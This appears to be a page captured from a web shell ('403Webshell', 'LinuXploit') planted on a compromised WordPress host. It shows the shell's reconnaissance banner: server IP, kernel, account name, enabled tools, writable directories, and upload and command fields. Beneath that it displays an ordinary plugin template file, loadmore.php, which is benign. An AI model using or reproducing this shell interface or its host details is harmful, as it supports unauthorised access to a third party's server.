403Webshell
Server IP : 172.67.214.6  /  Your IP : 216.73.216.73
Web Server : LiteSpeed
System : Linux premium900.web-hosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : redwjova ( 1790)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/redwjova/sort.llc/wp-content/plugins/ultimate-post/blocks/template/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/redwjova/sort.llc/wp-content/plugins/ultimate-post/blocks/template/loadmore.php
<?php
defined( 'ABSPATH' ) || exit;

// Adv Filter Integration
$adv_filter_dataset = ultimate_post()->get_adv_data_attrs($attr);

$attr["blockId"] = sanitize_html_class($attr["blockId"]);
$allowed_html_tags = ultimate_post()->ultp_allowed_html_tags();
$attr["loadMoreText"] = isset( $attr['loadMoreText'] ) ? wp_kses($attr["loadMoreText"], $allowed_html_tags) : 'Load More';

$page_post_id = (isset($attr['currentPostId']) &&  $attr['currentPostId'])  ? sanitize_html_class($attr['currentPostId']) : ultimate_post()->get_page_post_id($attr['blockId']);
$self_post_id = 'data-selfpostid="' .( (isset($attr['currentPostId']) &&  $attr['currentPostId']) ? "yes" : "no"). '"';
$exclude_id = isset($curr_post_id) ? $curr_post_id  : "";
$wraper_after .= '<div class="ultp-loadmore">';
    if ( 1 != $pageNum ) {
        $wraper_after .= '<span class="ultp-loadmore-action" tabindex="0" role="button" data-pages="'.$pageNum.'" data-pagenum="1"  data-expost="'.$exclude_id.'" data-blockid="'.$attr['blockId'].'" data-blockname="ultimate-post_'.$block_name.'" data-postid="'.$page_post_id.'" '.ultimate_post()->get_builder_attr($attr['queryType']).$self_post_id. $adv_filter_dataset . '>'.$attr['loadMoreText'].' <span class="ultp-spin">'.ultimate_post()->get_svg_icon('refresh').'</span></span>';
    }
$wraper_after .= '</div>';

Youez - 2016 - github.com/yon3zu
LinuXploit